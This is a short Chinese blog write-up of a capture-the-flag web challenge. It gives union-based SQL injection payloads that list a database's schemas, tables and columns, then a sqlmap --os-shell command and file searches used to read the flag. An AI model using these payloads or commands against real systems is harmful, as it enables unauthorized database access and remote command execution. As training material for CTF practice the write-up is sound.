文章管理系统
题目描述
这是我们的文章管理系统,快来看看有什么漏洞可以拿到FLAG吧?注意:可能有个假FLAG哦
解法
SQL 注入。
?id=1 or 1=1 --+
取得假 flag。
爆库名。
?id=1 union select 1,group_concat(schema_name) from information_schema.schemata --+
有个叫 ctftraining 的库。
爆表名。
?id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctftraining' --+
有个叫 FLAG_TABLE 的表。
爆字段名。
?id=1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='ctftraining' --+
字段叫 FLAG_COLUMN。
尝试读取 flag。
?id=1 union select 1, FLAG_COLUMN from ctftraining.FLAG_TABLE --+
没有结果输出。
你需要命令执行才能拿到最终FLAG(确信)
用 sqlmap 启动 shell。
sqlmap -u http://challenge.qsnctf.com:30045/?id=1 --os-shell
find / -name flag*
cat /flag
取得 flag。
Flag
qsnctf{b5241454dcdd4e29b44388f2df4e38d3}
声明
本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规。
博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规,不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任。